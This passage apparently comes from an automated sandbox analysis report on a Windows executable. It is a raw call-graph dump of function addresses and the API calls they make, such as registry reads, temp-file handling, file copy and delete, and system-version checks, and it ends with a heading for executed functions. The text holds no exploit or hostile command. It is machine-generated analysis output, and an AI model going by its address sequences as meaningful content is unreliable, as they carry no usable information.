97256->97268 97260 aa7547 97258->97260 97315 ac5183 26 API calls 97259->97315 97261 aa9cb3 22 API calls 97260->97261 97261->97263 97265 ae5058 97262->97265 97263->97232 97269 b28cd3 97263->97269 97264 abfddb 22 API calls 97266 ae507f 97264->97266 97265->97264 97267 aa9cb3 22 API calls 97266->97267 97267->97268 97314 abfb21 51 API calls 97268->97314 97270 aaaec9 22 API calls 97269->97270 97271 b28cee CharLowerBuffW 97270->97271 97316 b08e54 97271->97316 97275 aaa961 22 API calls 97276 b28d2a 97275->97276 97323 aa6d25 97276->97323 97278 b28d3e 97279 aa93b2 22 API calls 97278->97279 97281 b28d48 _wcslen 97279->97281 97280 b28e5e _wcslen 97280->97237 97281->97280 97336 b2851d 42 API calls _strftime 97281->97336 97283 b27ea1 97282->97283 97287 b27eec 97282->97287 97284 abfe0b 22 API calls 97283->97284 97286 b27ec3 97284->97286 97285 abfddb 22 API calls 97285->97286 97286->97285 97286->97287 97288 b29096 97287->97288 97289 b292ab ISource 97288->97289 97296 b290ba _strcat _wcslen 97288->97296 97289->97224 97290 aab38f 39 API calls 97290->97296 97291 aab567 39 API calls 97291->97296 97292 aab6b5 39 API calls 97292->97296 97293 aa7510 53 API calls 97293->97296 97294 acea0c 21 API calls ___std_exception_copy 97294->97296 97296->97289 97296->97290 97296->97291 97296->97292 97296->97293 97296->97294 97340 b0efae 24 API calls _wcslen 97296->97340 97298 abfc85 97297->97298 97299 abfd1d VirtualAlloc 97298->97299 97300 abfceb 97298->97300 97299->97300 97300->97227 97300->97228 97301->97237 97302->97237 97303->97231 97304->97233 97305->97235 97306->97239 97307->97244 97308->97244 97309->97244 97310->97216 97311->97244 97312->97254 97313->97254 97314->97259 97315->97255 97317 b08e74 _wcslen 97316->97317 97318 b08f63 97317->97318 97321 b08ea9 97317->97321 97322 b08f68 97317->97322 97318->97275 97318->97281 97321->97318 97337 abce60 41 API calls 97321->97337 97322->97318 97338 abce60 41 API calls 97322->97338 97324 aa6d91 97323->97324 97325 aa6d34 97323->97325 97326 aa93b2 22 API calls 97324->97326 97325->97324 97327 aa6d3f 97325->97327 97333 aa6d62 __fread_nolock 97326->97333 97328 aa6d5a 97327->97328 97329 ae4c9d 97327->97329 97339 aa6f34 22 API calls 97328->97339 97331 abfddb 22 API calls 97329->97331 97332 ae4ca7 97331->97332 97334 abfe0b 22 API calls 97332->97334 97333->97278 97335 ae4cda 97334->97335 97336->97280 97337->97321 97338->97322 97339->97333 97340->97296 97342 aaa961 22 API calls 97341->97342 97343 aa5275 97342->97343 97344 aaa961 22 API calls 97343->97344 97345 aa527d 97344->97345 97346 aaa961 22 API calls 97345->97346 97347 aa5285 97346->97347 97348 aaa961 22 API calls 97347->97348 97349 aa528d 97348->97349 97350 ae3df5 97349->97350 97351 aa52c1 97349->97351 97352 aaa8c7 22 API calls 97350->97352 97353 aa6d25 22 API calls 97351->97353 97354 ae3dfe 97352->97354 97355 aa52cf 97353->97355 97356 aaa6c3 22 API calls 97354->97356 97357 aa93b2 22 API calls 97355->97357 97359 aa5304 97356->97359 97358 aa52d9 97357->97358 97358->97359 97360 aa6d25 22 API calls 97358->97360 97362 aa5325 97359->97362 97368 ae3e20 97359->97368 97375 aa5349 97359->97375 97361 aa52fa 97360->97361 97364 aa93b2 22 API calls 97361->97364 97367 aa4c6d 22 API calls 97362->97367 97362->97375 97363 aa6d25 22 API calls 97365 aa535a 97363->97365 97364->97359 97366 aa5370 97365->97366 97372 aaa8c7 22 API calls 97365->97372 97369 aa5384 97366->97369 97373 aaa8c7 22 API calls 97366->97373 97370 aa5332 97367->97370 97371 aa6b57 22 API calls 97368->97371 97376 aaa8c7 22 API calls 97369->97376 97377 aa538f 97369->97377 97374 aa6d25 22 API calls 97370->97374 97370->97375 97380 ae3ee0 97371->97380 97372->97366 97373->97369 97374->97375 97375->97363 97376->97377 97378 aaa8c7 22 API calls 97377->97378 97382 aa539a 97377->97382 97378->97382 97379 aa4c6d 22 API calls 97379->97380 97380->97375 97380->97379 97498 aa49bd 22 API calls __fread_nolock 97380->97498 97382->97105 97384 aaaec9 22 API calls 97383->97384 97385 aa4c78 97384->97385 97385->97109 97385->97110 97387 b0d7d8 97386->97387 97388 b0d7f3 97387->97388 97389 b0d7dd 97387->97389 97390 aaa961 22 API calls 97388->97390 97391 aaa8c7 22 API calls 97389->97391 97439 b0d7ee 97389->97439 97392 b0d7fb 97390->97392 97391->97439 97393 aaa961 22 API calls 97392->97393 97394 b0d803 97393->97394 97395 aaa961 22 API calls 97394->97395 97396 b0d80e 97395->97396 97397 aaa961 22 API calls 97396->97397 97398 b0d816 97397->97398 97399 aaa961 22 API calls 97398->97399 97400 b0d81e 97399->97400 97401 aaa961 22 API calls 97400->97401 97402 b0d826 97401->97402 97403 aaa961 22 API calls 97402->97403 97404 b0d82e 97403->97404 97405 aaa961 22 API calls 97404->97405 97406 b0d836 97405->97406 97407 aa525f 22 API calls 97406->97407 97408 b0d84d 97407->97408 97409 aa525f 22 API calls 97408->97409 97410 b0d866 97409->97410 97411 aa4c6d 22 API calls 97410->97411 97412 b0d872 97411->97412 97413 b0d885 97412->97413 97414 aa93b2 22 API calls 97412->97414 97415 aa4c6d 22 API calls 97413->97415 97414->97413 97416 b0d88e 97415->97416 97417 b0d89e 97416->97417 97418 aa93b2 22 API calls 97416->97418 97419 b0d8b0 97417->97419 97420 aaa8c7 22 API calls 97417->97420 97418->97417 97421 aa6350 22 API calls 97419->97421 97420->97419 97422 b0d8bb 97421->97422 97499 b0d978 22 API calls 97422->97499 97424 b0d8ca 97500 b0d978 22 API calls 97424->97500 97426 b0d8dd 97427 aa4c6d 22 API calls 97426->97427 97428 b0d8e7 97427->97428 97429 b0d8ec 97428->97429 97430 b0d8fe 97428->97430 97431 aa33c6 22 API calls 97429->97431 97432 aa4c6d 22 API calls 97430->97432 97433 b0d8f9 97431->97433 97434 b0d907 97432->97434 97438 aa6350 22 API calls 97433->97438 97435 b0d925 97434->97435 97437 aa33c6 22 API calls 97434->97437 97436 aa6350 22 API calls 97435->97436 97436->97439 97437->97433 97438->97435 97439->97126 97441 b12954 __wsopen_s 97440->97441 97442 abfe0b 22 API calls 97441->97442 97443 b12971 97442->97443 97444 aa5722 22 API calls 97443->97444 97445 b1297b 97444->97445 97446 b1274e 27 API calls 97445->97446 97447 b12986 97446->97447 97448 aa511f 64 API calls 97447->97448 97449 b1299b 97448->97449 97450 b12a6c 97449->97450 97451 b129bf 97449->97451 97452 b12e66 75 API calls 97450->97452 97453 b12e66 75 API calls 97451->97453 97468 b12a38 97452->97468 97454 b129c4 97453->97454 97458 b12a75 ISource 97454->97458 97505 acd583 26 API calls 97454->97505 97456 aa50f5 40 API calls 97457 b12a91 97456->97457 97459 aa50f5 40 API calls 97457->97459 97458->97133 97461 b12aa1 97459->97461 97460 b129ed 97506 acd583 26 API calls 97460->97506 97462 aa50f5 40 API calls 97461->97462 97464 b12abc 97462->97464 97465 aa50f5 40 API calls 97464->97465 97466 b12acc 97465->97466 97467 aa50f5 40 API calls 97466->97467 97469 b12ae7 97467->97469 97468->97456 97468->97458 97470 aa50f5 40 API calls 97469->97470 97471 b12af7 97470->97471 97472 aa50f5 40 API calls 97471->97472 97473 b12b07 97472->97473 97474 aa50f5 40 API calls 97473->97474 97475 b12b17 97474->97475 97501 b13017 GetTempPathW GetTempFileNameW 97475->97501 97477 b12b22 97478 ace5eb 29 API calls 97477->97478 97489 b12b33 97478->97489 97479 b12bed 97480 ace678 67 API calls 97479->97480 97481 b12bf8 97480->97481 97483 b12c12 97481->97483 97484 b12bfe DeleteFileW 97481->97484 97482 aa50f5 40 API calls 97482->97489 97485 b12c91 CopyFileW 97483->97485 97491 b12c18 97483->97491 97484->97458 97486 b12ca7 DeleteFileW 97485->97486 97487 b12cb9 DeleteFileW 97485->97487 97486->97458 97502 b12fd8 CreateFileW 97487->97502 97489->97458 97489->97479 97489->97482 97490 acdbb3 65 API calls 97489->97490 97490->97489 97492 b122ce 79 API calls 97491->97492 97493 b12c7c 97492->97493 97493->97487 97494 b12c80 DeleteFileW 97493->97494 97494->97458 97495->97060 97496->97093 97497->97106 97498->97380 97499->97424 97500->97426 97501->97477 97503 b13013 97502->97503 97504 b12fff SetFileTime CloseHandle 97502->97504 97503->97458 97504->97503 97505->97460 97506->97468 97508 aaae01 97507->97508 97511 aaae1c ISource 97507->97511 97509 aaaec9 22 API calls 97508->97509 97510 aaae09 CharUpperBuffW 97509->97510 97510->97511 97511->96910 97514 aaacae 97512->97514 97513 aaacd1 97513->96951 97514->97513 97536 b1359c 82 API calls __wsopen_s 97514->97536 97516->96951 97517->96962 97518->96958 97519->96958 97520->96914 97521->96965 97522->96928 97523->96965 97524->96965 97525->96951 97526->96951 97527->96951 97528->96951 97529->96951 97530->96951 97531->96941 97532->96965 97533->96949 97534->96959 97535->96965 97536->97513 97537->96988 97538->96988 97539->96984 97540->96984 97541->96991 97542->96984 97543 ad8402 97548 ad81be 97543->97548 97546 ad842a 97549 ad81ef try_get_first_available_module 97548->97549 97559 ad8338 97549->97559 97563 ac8e0b 40 API calls 2 library calls 97549->97563 97551 ad83ee 97567 ad27ec 26 API calls _strftime 97551->97567 97553 ad8343 97553->97546 97560 ae0984 97553->97560 97555 ad838c 97555->97559 97564 ac8e0b 40 API calls 2 library calls 97555->97564 97557 ad83ab 97557->97559 97565 ac8e0b 40 API calls 2 library calls 97557->97565 97559->97553 97566 acf2d9 20 API calls _free 97559->97566 97568 ae0081 97560->97568 97562 ae099f 97562->97546 97563->97555 97564->97557 97565->97559 97566->97551 97567->97553 97569 ae008d ___BuildCatchObject 97568->97569 97570 ae009b 97569->97570 97573 ae00d4 97569->97573 97625 acf2d9 20 API calls _free 97570->97625 97572 ae00a0 97626 ad27ec 26 API calls _strftime 97572->97626 97579 ae065b 97573->97579 97578 ae00aa __wsopen_s 97578->97562 97580 ae0678 97579->97580 97581 ae068d 97580->97581 97582 ae06a6 97580->97582 97642 acf2c6 20 API calls _free 97581->97642 97628 ad5221 97582->97628 97585 ae0692 97643 acf2d9 20 API calls _free 97585->97643 97586 ae06ab 97587 ae06cb 97586->97587 97588 ae06b4 97586->97588 97641 ae039a CreateFileW 97587->97641 97644 acf2c6 20 API calls _free 97588->97644 97592 ae06b9 97645 acf2d9 20 API calls _free 97592->97645 97594 ae0781 GetFileType 97596 ae078c GetLastError 97594->97596 97597 ae07d3 97594->97597 97595 ae0756 GetLastError 97647 acf2a3 20 API calls 2 library calls 97595->97647 97648 acf2a3 20 API calls 2 library calls 97596->97648 97650 ad516a 21 API calls 3 library calls 97597->97650 97598 ae0704 97598->97594 97598->97595 97646 ae039a CreateFileW 97598->97646 97602 ae079a CloseHandle 97602->97585 97605 ae07c3 97602->97605 97604 ae0749 97604->97594 97604->97595 97649 acf2d9 20 API calls _free 97605->97649 97606 ae07f4 97608 ae0840 97606->97608 97651 ae05ab 72 API calls 4 library calls 97606->97651 97613 ae086d 97608->97613 97652 ae014d 72 API calls 4 library calls 97608->97652 97609 ae07c8 97609->97585 97612 ae0866 97612->97613 97614 ae087e 97612->97614 97615 ad86ae __wsopen_s 29 API calls 97613->97615 97616 ae00f8 97614->97616 97617 ae08fc CloseHandle 97614->97617 97615->97616 97627 ae0121 LeaveCriticalSection __wsopen_s 97616->97627 97653 ae039a CreateFileW 97617->97653 97619 ae0927 97620 ae095d 97619->97620 97621 ae0931 GetLastError 97619->97621 97620->97616 97654 acf2a3 20 API calls 2 library calls 97621->97654 97623 ae093d 97655 ad5333 21 API calls 3 library calls 97623->97655 97625->97572 97626->97578 97627->97578 97629 ad522d ___BuildCatchObject 97628->97629 97656 ad2f5e EnterCriticalSection 97629->97656 97631 ad527b 97657 ad532a 97631->97657 97632 ad5259 97660 ad5000 21 API calls 2 library calls 97632->97660 97635 ad52a4 __wsopen_s 97635->97586 97636 ad5234 97636->97631 97636->97632 97638 ad52c7 EnterCriticalSection 97636->97638 97637 ad525e 97637->97631 97661 ad5147 EnterCriticalSection 97637->97661 97638->97631 97639 ad52d4 LeaveCriticalSection 97638->97639 97639->97636 97641->97598 97642->97585 97643->97616 97644->97592 97645->97585 97646->97604 97647->97585 97648->97602 97649->97609 97650->97606 97651->97608 97652->97612 97653->97619 97654->97623 97655->97620 97656->97636 97662 ad2fa6 LeaveCriticalSection 97657->97662 97659 ad5331 97659->97635 97660->97637 97661->97631 97662->97659 97663 aa105b 97668 aa344d 97663->97668 97665 aa106a 97699 ac00a3 29 API calls __onexit 97665->97699 97667 aa1074 97669 aa345d __wsopen_s 97668->97669 97670 aaa961 22 API calls 97669->97670 97671 aa3513 97670->97671 97672 aa3a5a 24 API calls 97671->97672 97673 aa351c 97672->97673 97700 aa3357 97673->97700 97676 aa33c6 22 API calls 97677 aa3535 97676->97677 97678 aa515f 22 API calls 97677->97678 97679 aa3544 97678->97679 97680 aaa961 22 API calls 97679->97680 97681 aa354d 97680->97681 97682 aaa6c3 22 API calls 97681->97682 97683 aa3556 RegOpenKeyExW 97682->97683 97684 ae3176 RegQueryValueExW 97683->97684 97688 aa3578 97683->97688 97685 ae320c RegCloseKey 97684->97685 97686 ae3193 97684->97686 97685->97688 97691 ae321e _wcslen 97685->97691 97687 abfe0b 22 API calls 97686->97687 97689 ae31ac 97687->97689 97688->97665 97690 aa5722 22 API calls 97689->97690 97692 ae31b7 RegQueryValueExW 97690->97692 97691->97688 97693 aa4c6d 22 API calls 97691->97693 97697 aa9cb3 22 API calls 97691->97697 97698 aa515f 22 API calls 97691->97698 97694 ae31d4 97692->97694 97695 ae31ee ISource 97692->97695 97693->97691 97696 aa6b57 22 API calls 97694->97696 97695->97685 97696->97695 97697->97691 97698->97691 97699->97667 97701 ae1f50 __wsopen_s 97700->97701 97702 aa3364 GetFullPathNameW 97701->97702 97703 aa3386 97702->97703 97704 aa6b57 22 API calls 97703->97704 97705 aa33a4 97704->97705 97705->97676 97706 aa1098 97711 aa42de 97706->97711 97710 aa10a7 97712 aaa961 22 API calls 97711->97712 97713 aa42f5 GetVersionExW 97712->97713 97714 aa6b57 22 API calls 97713->97714 97715 aa4342 97714->97715 97716 aa93b2 22 API calls 97715->97716 97728 aa4378 97715->97728 97717 aa436c 97716->97717 97719 aa37a0 22 API calls 97717->97719 97718 aa441b GetCurrentProcess IsWow64Process 97720 aa4437 97718->97720 97719->97728 97721 aa444f LoadLibraryA 97720->97721 97722 ae3824 GetSystemInfo 97720->97722 97723 aa449c GetSystemInfo 97721->97723 97724 aa4460 GetProcAddress 97721->97724 97727 aa4476 97723->97727 97724->97723 97726 aa4470 GetNativeSystemInfo 97724->97726 97725 ae37df 97726->97727 97729 aa447a FreeLibrary 97727->97729 97730 aa109d 97727->97730 97728->97718 97728->97725 97729->97730 97731 ac00a3 29 API calls __onexit 97730->97731 97731->97710 97732 aaf7bf 97733 aaf7d3 97732->97733 97734 aafcb6 97732->97734 97736 aafcc2 97733->97736 97737 abfddb 22 API calls 97733->97737 97769 aaaceb 23 API calls ISource 97734->97769 97770 aaaceb 23 API calls ISource 97736->97770 97739 aaf7e5 97737->97739 97739->97736 97740 aaf83e 97739->97740 97741 aafd3d 97739->97741 97743 ab1310 239 API calls 97740->97743 97758 aaed9d ISource 97740->97758 97771 b11155 22 API calls 97741->97771 97765 aaec76 ISource 97743->97765 97744 aafef7 97753 aaa8c7 22 API calls 97744->97753 97744->97758 97746 abfddb 22 API calls 97746->97765 97748 af4b0b 97773 b1359c 82 API calls __wsopen_s 97748->97773 97749 aaa8c7 22 API calls 97749->97765 97750 af4600 97756 aaa8c7 22 API calls 97750->97756 97750->97758 97753->97758 97755 ac0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97755->97765 97756->97758 97757 aafbe3 97757->97758 97760 af4bdc 97757->97760 97766 aaf3ae ISource 97757->97766 97759 aaa961 22 API calls 97759->97765 97774 b1359c 82 API calls __wsopen_s 97760->97774 97762 ac00a3 29 API calls pre_c_initialization 97762->97765 97763 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97763->97765 97764 af4beb 97775 b1359c 82 API calls __wsopen_s 97764->97775 97765->97744 97765->97746 97765->97748 97765->97749 97765->97750 97765->97755 97765->97757 97765->97758 97765->97759 97765->97762 97765->97763 97765->97764 97765->97766 97767 ab01e0 239 API calls 2 library calls 97765->97767 97768 ab06a0 41 API calls ISource 97765->97768 97766->97758 97772 b1359c 82 API calls __wsopen_s 97766->97772 97767->97765 97768->97765 97769->97736 97770->97741 97771->97758 97772->97758 97773->97758 97774->97764 97775->97758 97776 ad90fa 97777 ad9107 97776->97777 97780 ad911f 97776->97780 97826 acf2d9 20 API calls _free 97777->97826 97779 ad910c 97827 ad27ec 26 API calls _strftime 97779->97827 97782 ad917a 97780->97782 97790 ad9117 97780->97790 97828 adfdc4 21 API calls 2 library calls 97780->97828 97784 acd955 __fread_nolock 26 API calls 97782->97784 97785 ad9192 97784->97785 97796 ad8c32 97785->97796 97787 ad9199 97788 acd955 __fread_nolock 26 API calls 97787->97788 97787->97790 97789 ad91c5 97788->97789 97789->97790 97791 acd955 __fread_nolock 26 API calls 97789->97791 97792 ad91d3 97791->97792 97792->97790 97793 acd955 __fread_nolock 26 API calls 97792->97793 97794 ad91e3 97793->97794 97795 acd955 __fread_nolock 26 API calls 97794->97795 97795->97790 97797 ad8c3e ___BuildCatchObject 97796->97797 97798 ad8c46 97797->97798 97802 ad8c5e 97797->97802 97830 acf2c6 20 API calls _free 97798->97830 97800 ad8d24 97837 acf2c6 20 API calls _free 97800->97837 97801 ad8c4b 97831 acf2d9 20 API calls _free 97801->97831 97802->97800 97806 ad8c97 97802->97806 97804 ad8d29 97838 acf2d9 20 API calls _free 97804->97838 97808 ad8cbb 97806->97808 97809 ad8ca6 97806->97809 97829 ad5147 EnterCriticalSection 97808->97829 97832 acf2c6 20 API calls _free 97809->97832 97811 ad8cb3 97839 ad27ec 26 API calls _strftime 97811->97839 97813 ad8cc1 97815 ad8cdd 97813->97815 97816 ad8cf2 97813->97816 97814 ad8cab 97833 acf2d9 20 API calls _free 97814->97833 97834 acf2d9 20 API calls _free 97815->97834 97821 ad8d45 __fread_nolock 38 API calls 97816->97821 97818 ad8c53 __wsopen_s 97818->97787 97823 ad8ced 97821->97823 97822 ad8ce2 97835 acf2c6 20 API calls _free 97822->97835 97836 ad8d1c LeaveCriticalSection __wsopen_s 97823->97836 97826->97779 97827->97790 97828->97782 97829->97813 97830->97801 97831->97818 97832->97814 97833->97811 97834->97822 97835->97823 97836->97818 97837->97804 97838->97811 97839->97818 97840 ac03fb 97841 ac0407 ___BuildCatchObject 97840->97841 97869 abfeb1 97841->97869 97843 ac040e 97844 ac0561 97843->97844 97847 ac0438 97843->97847 97896 ac083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97844->97896 97846 ac0568 97897 ac4e52 28 API calls _abort 97846->97897 97854 ac0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97847->97854 97880 ad247d 97847->97880 97849 ac056e 97898 ac4e04 28 API calls _abort 97849->97898 97853 ac0576 97857 ac04d8 97854->97857 97892 ac4e1a 38 API calls 3 library calls 97854->97892 97855 ac0457 97888 ac0959 97857->97888 97860 ac04de 97861 ac04f3 97860->97861 97893 ac0992 GetModuleHandleW 97861->97893 97863 ac04fa 97863->97846 97864 ac04fe 97863->97864 97865 ac0507 97864->97865 97894 ac4df5 28 API calls _abort 97864->97894 97895 ac0040 13 API calls 2 library calls 97865->97895 97868 ac050f 97868->97855 97870 abfeba 97869->97870 97899 ac0698 IsProcessorFeaturePresent 97870->97899 97872 abfec6 97900 ac2c94 10 API calls 3 library calls 97872->97900 97874 abfecb 97875 abfecf 97874->97875 97901 ad2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97874->97901 97875->97843 97877 abfed8 97878 abfee6 97877->97878 97902 ac2cbd 8 API calls 3 library calls 97877->97902 97878->97843 97882 ad2494 97880->97882 97881 ac0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97883 ac0451 97881->97883 97882->97881 97883->97855 97884 ad2421 97883->97884 97886 ad2450 97884->97886 97885 ac0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97887 ad2479 97885->97887 97886->97885 97887->97854 97903 ac2340 97888->97903 97890 ac096c GetStartupInfoW 97891 ac097f 97890->97891 97891->97860 97892->97857 97893->97863 97894->97865 97895->97868 97896->97846 97897->97849 97898->97853 97899->97872 97900->97874 97901->97877 97902->97875 97904 ac2357 97903->97904 97904->97890 97904->97904 97905 aa1033 97910 aa4c91 97905->97910 97909 aa1042 97911 aaa961 22 API calls 97910->97911 97912 aa4cff 97911->97912 97918 aa3af0 97912->97918 97915 aa4d9c 97916 aa1038 97915->97916 97921 aa51f7 22 API calls __fread_nolock 97915->97921 97917 ac00a3 29 API calls __onexit 97916->97917 97917->97909 97922 aa3b1c 97918->97922 97921->97915 97923 aa3b0f 97922->97923 97924 aa3b29 97922->97924 97923->97915 97924->97923 97925 aa3b30 RegOpenKeyExW 97924->97925 97925->97923 97926 aa3b4a RegQueryValueExW 97925->97926 97927 aa3b6b 97926->97927 97928 aa3b80 RegCloseKey 97926->97928 97927->97928 97928->97923 97929 aadf10 97932 aab710 97929->97932 97933 aab72b 97932->97933 97934 af00f8 97933->97934 97935 af0146 97933->97935 97957 aab750 97933->97957 97938 af0102 97934->97938 97941 af010f 97934->97941 97934->97957 97974 b258a2 239 API calls 2 library calls 97935->97974 97972 b25d33 239 API calls 97938->97972 97953 aaba20 97941->97953 97973 b261d0 239 API calls 2 library calls 97941->97973 97944 af03d9 97944->97944 97948 aaba4e 97949 af0322 97977 b25c0c 82 API calls 97949->97977 97953->97948 97978 b1359c 82 API calls __wsopen_s 97953->97978 97957->97948 97957->97949 97957->97953 97958 abd336 40 API calls 97957->97958 97959 aabbe0 40 API calls 97957->97959 97960 aaec40 239 API calls 97957->97960 97961 aaa8c7 22 API calls 97957->97961 97963 aaa81b 41 API calls 97957->97963 97964 abd2f0 40 API calls 97957->97964 97965 aba01b 239 API calls 97957->97965 97966 ac0242 5 API calls __Init_thread_wait 97957->97966 97967 abedcd 22 API calls 97957->97967 97968 ac00a3 29 API calls __onexit 97957->97968 97969 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97957->97969 97970 abee53 82 API calls 97957->97970 97971 abe5ca 239 API calls 97957->97971 97975 aaaceb 23 API calls ISource 97957->97975 97976 aff6bf 23 API calls 97957->97976 97958->97957 97959->97957 97960->97957 97961->97957 97963->97957 97964->97957 97965->97957 97966->97957 97967->97957 97968->97957 97969->97957 97970->97957 97971->97957 97972->97941 97973->97953 97974->97957 97975->97957 97976->97957 97977->97953 97978->97944 97979 af3f75 97990 abceb1 97979->97990 97981 af3f8b 97982 af4006 97981->97982 97999 abe300 23 API calls 97981->97999 97984 aabf40 239 API calls 97982->97984 97985 af4052 97984->97985 97988 af4a88 97985->97988 98001 b1359c 82 API calls __wsopen_s 97985->98001 97987 af3fe6 97987->97985 98000 b11abf 22 API calls 97987->98000 97991 abcebf 97990->97991 97992 abced2 97990->97992 98002 aaaceb 23 API calls ISource 97991->98002 97993 abced7 97992->97993 97994 abcf05 97992->97994 97996 abfddb 22 API calls 97993->97996 98003 aaaceb 23 API calls ISource 97994->98003 97998 abcec9 97996->97998 97998->97981 97999->97987 98000->97982 98001->97988 98002->97998 98003->97998 98004 aa3156 98007 aa3170 98004->98007 98008 aa3187 98007->98008 98009 aa31eb 98008->98009 98010 aa318c 98008->98010 98047 aa31e9 98008->98047 98014 ae2dfb 98009->98014 98015 aa31f1 98009->98015 98011 aa3199 98010->98011 98012 aa3265 PostQuitMessage 98010->98012 98017 ae2e7c 98011->98017 98018 aa31a4 98011->98018 98049 aa316a 98012->98049 98013 aa31d0 DefWindowProcW 98013->98049 98056 aa18e2 10 API calls 98014->98056 98019 aa31f8 98015->98019 98020 aa321d SetTimer RegisterWindowMessageW 98015->98020 98061 b0bf30 34 API calls ___scrt_fastfail 98017->98061 98022 aa31ae 98018->98022 98023 ae2e68 98018->98023 98026 ae2d9c 98019->98026 98027 aa3201 KillTimer 98019->98027 98024 aa3246 CreatePopupMenu 98020->98024 98020->98049 98021 ae2e1c 98057 abe499 42 API calls 98021->98057 98030 ae2e4d 98022->98030 98031 aa31b9 98022->98031 98060 b0c161 27 API calls ___scrt_fastfail 98023->98060 98024->98049 98033 ae2dd7 MoveWindow 98026->98033 98034 ae2da1 98026->98034 98052 aa30f2 Shell_NotifyIconW ___scrt_fastfail 98027->98052 98030->98013 98059 b00ad7 22 API calls 98030->98059 98037 aa31c4 98031->98037 98038 aa3253 98031->98038 98032 ae2e8e 98032->98013 98032->98049 98033->98049 98039 ae2dc6 SetFocus 98034->98039 98040 ae2da7 98034->98040 98036 aa3263 98036->98049 98037->98013 98058 aa30f2 Shell_NotifyIconW ___scrt_fastfail 98037->98058 98054 aa326f 44 API calls ___scrt_fastfail 98038->98054 98039->98049 98040->98037 98043 ae2db0 98040->98043 98041 aa3214 98053 aa3c50 DeleteObject DestroyWindow 98041->98053 98055 aa18e2 10 API calls 98043->98055 98047->98013 98050 ae2e41 98051 aa3837 49 API calls 98050->98051 98051->98047 98052->98041 98053->98049 98054->98036 98055->98049 98056->98021 98057->98037 98058->98050 98059->98047 98060->98036 98061->98032 98062 aa2e37 98063 aaa961 22 API calls 98062->98063 98064 aa2e4d 98063->98064 98141 aa4ae3 98064->98141 98066 aa2e6b 98067 aa3a5a 24 API calls 98066->98067 98068 aa2e7f 98067->98068 98069 aa9cb3 22 API calls 98068->98069 98070 aa2e8c 98069->98070 98071 aa4ecb 94 API calls 98070->98071 98072 aa2ea5 98071->98072 98073 aa2ead 98072->98073 98074 ae2cb0 98072->98074 98077 aaa8c7 22 API calls 98073->98077 98075 b12cf9 80 API calls 98074->98075 98076 ae2cc3 98075->98076 98078 ae2ccf 98076->98078 98080 aa4f39 68 API calls 98076->98080 98079 aa2ec3 98077->98079 98083 aa4f39 68 API calls 98078->98083 98155 aa6f88 22 API calls 98079->98155 98080->98078 98082 aa2ecf 98085 aa9cb3 22 API calls 98082->98085 98084 ae2ce5 98083->98084 98171 aa3084 22 API calls 98084->98171 98086 aa2edc 98085->98086 98156 aaa81b 41 API calls 98086->98156 98089 aa2eec 98091 aa9cb3 22 API calls 98089->98091 98090 ae2d02 98172 aa3084 22 API calls 98090->98172 98093 aa2f12 98091->98093 98157 aaa81b 41 API calls 98093->98157 98094 ae2d1e 98096 aa3a5a 24 API calls 98094->98096 98098 ae2d44 98096->98098 98097 aa2f21 98100 aaa961 22 API calls 98097->98100 98173 aa3084 22 API calls 98098->98173 98102 aa2f3f 98100->98102 98101 ae2d50 98103 aaa8c7 22 API calls 98101->98103 98158 aa3084 22 API calls 98102->98158 98104 ae2d5e 98103->98104 98174 aa3084 22 API calls 98104->98174 98107 aa2f4b 98159 ac4a28 40 API calls 2 library calls 98107->98159 98109 aa2f59 98109->98084 98111 aa2f63 98109->98111 98110 ae2d6d 98112 aaa8c7 22 API calls 98110->98112 98160 ac4a28 40 API calls 2 library calls 98111->98160 98114 ae2d83 98112->98114 98175 aa3084 22 API calls 98114->98175 98115 aa2f6e 98115->98090 98117 aa2f78 98115->98117 98161 ac4a28 40 API calls 2 library calls 98117->98161 98118 ae2d90 98120 aa2f83 98120->98094 98121 aa2f8d 98120->98121 98162 ac4a28 40 API calls 2 library calls 98121->98162 98123 aa2f98 98124 aa2fdc 98123->98124 98163 aa3084 22 API calls 98123->98163 98124->98110 98125 aa2fe8 98124->98125 98125->98118 98165 aa63eb 22 API calls 98125->98165 98127 aa2fbf 98129 aaa8c7 22 API calls 98127->98129 98131 aa2fcd 98129->98131 98130 aa2ff8 98166 aa6a50 22 API calls 98130->98166 98164 aa3084 22 API calls 98131->98164 98133 aa3006 98167 aa70b0 23 API calls 98133->98167 98138 aa3021 98139 aa3065 98138->98139 98168 aa6f88 22 API calls 98138->98168 98169 aa70b0 23 API calls 98138->98169 98170 aa3084 22 API calls 98138->98170 98142 aa4af0 __wsopen_s 98141->98142 98143 aa6b57 22 API calls 98142->98143 98144 aa4b22 98142->98144 98143->98144 98145 aa4c6d 22 API calls 98144->98145 98150 aa4b58 98144->98150 98145->98144 98146 aa4c6d 22 API calls 98146->98150 98147 aa9cb3 22 API calls 98149 aa4c52 98147->98149 98148 aa9cb3 22 API calls 98148->98150 98151 aa515f 22 API calls 98149->98151 98150->98146 98150->98148 98152 aa515f 22 API calls 98150->98152 98154 aa4c29 98150->98154 98153 aa4c5e 98151->98153 98152->98150 98153->98066 98154->98147 98154->98153 98155->98082 98156->98089 98157->98097 98158->98107 98159->98109 98160->98115 98161->98120 98162->98123 98163->98127 98164->98124 98165->98130 98166->98133 98167->98138 98168->98138 98169->98138 98170->98138 98171->98090 98172->98094 98173->98101 98174->98110 98175->98118

                  Executed Functions

                  Function 00AA42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
